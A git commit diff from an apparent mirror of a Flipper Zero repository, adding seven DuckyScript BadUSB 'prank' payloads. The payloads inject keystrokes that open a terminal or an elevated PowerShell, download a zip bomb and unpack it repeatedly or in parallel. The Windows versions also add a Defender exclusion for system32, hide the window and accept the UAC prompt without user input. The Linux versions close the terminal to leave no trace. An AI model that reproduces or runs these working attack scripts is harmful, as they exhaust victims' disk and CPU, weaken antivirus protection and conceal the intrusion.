mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 21:31:29 +00:00
added updated t119 brute/badusb bombs
This commit is contained in:
@@ -0,0 +1,18 @@
|
||||
REM Title: Zip bomb tux style
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Unix-like tested on kubuntu 22.04
|
||||
REM Props: Hak5, strippers and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM zipbomb I found and thought I would have some fun with. Opens a background download/unzip, and closes the terminal for no visual evidence.
|
||||
DELAY 300
|
||||
REM Minimize all windows as that ensures launch happens smoother and when the terminal is launched everything else is relaunched for no trace of funny business.
|
||||
WINDOWS d
|
||||
DELAY 300
|
||||
CTRL-ALT t
|
||||
DELAY 1500
|
||||
REM FIRE IN THE HOLE!
|
||||
STRING cd /tmp/ && nohup wget -q https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip 2>/dev/null && unzip 42.zip 2>/dev/null & disown
|
||||
ENTER
|
||||
DELAY 500
|
||||
ALT F4
|
||||
File diff suppressed because one or more lines are too long
@@ -0,0 +1,18 @@
|
||||
REM Title: Zip bomb tux style
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Unix-like tested on kubuntu 22.04
|
||||
REM Props: Hak5, strippers and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM zipbomb I found and thought I would have some fun with. Opens a background download/unzip, and closes the terminal for no visual evidence. This version launches one in tmp, $HOME and /dev/shm wtih history covering
|
||||
DELAY 300
|
||||
REM Minimize all windows as that ensures launch happens smoother and when the terminal is launched everything else is relaunched for no trace of funny business.
|
||||
WINDOWS d
|
||||
DELAY 300
|
||||
CTRL-ALT t
|
||||
DELAY 1500
|
||||
REM FIRE IN THE HOLE!
|
||||
STRING cd /tmp/ && nohup wget -q https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip 2>/dev/null && unzip 42.zip 2>/dev/null & unzip 42.zip -d /dev/shm 2>/dev/null & unzip 42.zip -d $HOME 2>/dev/null & disown
|
||||
ENTER
|
||||
DELAY 500
|
||||
ALT F4
|
||||
File diff suppressed because one or more lines are too long
@@ -0,0 +1,19 @@
|
||||
REM Title: Zip Bomb
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Win, tested on 10
|
||||
REM Props: Hak5, friends and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches zip bomb
|
||||
REM
|
||||
REM startup delay
|
||||
DELAY 300
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
ENTER
|
||||
DELAY 2000
|
||||
ALT y
|
||||
DELAY 2000
|
||||
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32 ;; curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip ;; Expand-Archive -Path 42.zip -Force
|
||||
ENTER
|
||||
@@ -0,0 +1,19 @@
|
||||
REM Title: Zip Bomb
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Win, tested on 10
|
||||
REM Props: Hak5, friends and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches zip bomb and openes another after that one is done.
|
||||
REM
|
||||
REM startup delay
|
||||
DELAY 300
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
ENTER
|
||||
DELAY 2000
|
||||
ALT y
|
||||
DELAY 2000
|
||||
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32 ;; curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip ;; while (1) { Expand-Archive -Path 42.zip -Force; }
|
||||
ENTER
|
||||
@@ -0,0 +1,19 @@
|
||||
REM Title: Zip Bomb
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Win, tested on 10
|
||||
REM Props: Hak5, friends and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
|
||||
REM
|
||||
REM startup delay
|
||||
DELAY 300
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
ENTER
|
||||
DELAY 2000
|
||||
ALT y
|
||||
DELAY 2000
|
||||
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;$NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke()
|
||||
ENTER
|
||||
@@ -0,0 +1,19 @@
|
||||
REM Title: Zip Bomb
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Win, tested on 10
|
||||
REM Props: Hak5, friends and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
|
||||
REM
|
||||
REM startup delay
|
||||
DELAY 300
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
ENTER
|
||||
DELAY 2000
|
||||
ALT y
|
||||
DELAY 2000
|
||||
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;while (1) { $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke(); }
|
||||
ENTER
|
||||
@@ -0,0 +1,21 @@
|
||||
REM Title: Zip Bomb
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Win, alt for possible 10/11 launch untested
|
||||
REM Props: Hak5, friends and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
|
||||
REM
|
||||
REM startup delay
|
||||
DELAY 300
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
SHIFT TAB
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;while (1) { $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke(); }
|
||||
ENTER
|
||||
Reference in New Issue
Block a user